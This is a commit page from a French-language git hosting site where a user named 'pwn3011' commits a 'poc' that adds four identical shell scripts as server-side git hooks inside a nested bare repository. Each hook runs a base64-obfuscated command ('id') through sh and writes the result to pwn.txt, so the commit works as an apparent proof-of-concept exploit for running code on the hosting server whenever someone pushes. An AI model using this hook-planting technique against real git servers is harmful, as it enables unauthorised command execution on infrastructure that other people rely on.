This website works better with JavaScript
Accueil
Explorer
Aide
S'inscrire
Connexion
pwn3011
/
w96f1
Suivre
1
Voter
0
Fork
0
Fichiers
Tickets
0
Pull Requests
0
Wiki
Parcourir la source
poc
x
il y a 1 mois
Parent
57d71764a8
commit
0c00f5fa7d
4 fichiers modifiés
avec
8 ajouts
et
0 suppressions
Vue séparée
Afficher les stats Diff
2
0
n/r34fd.git/hooks/post-receive
2
0
n/r34fd.git/hooks/post-update
2
0
n/r34fd.git/hooks/pre-receive
2
0
n/r34fd.git/hooks/update
+ 2
- 0
n/r34fd.git/hooks/post-receive
Voir le fichier
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/post-update
Voir le fichier
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/pre-receive
Voir le fichier
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/update
Voir le fichier
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt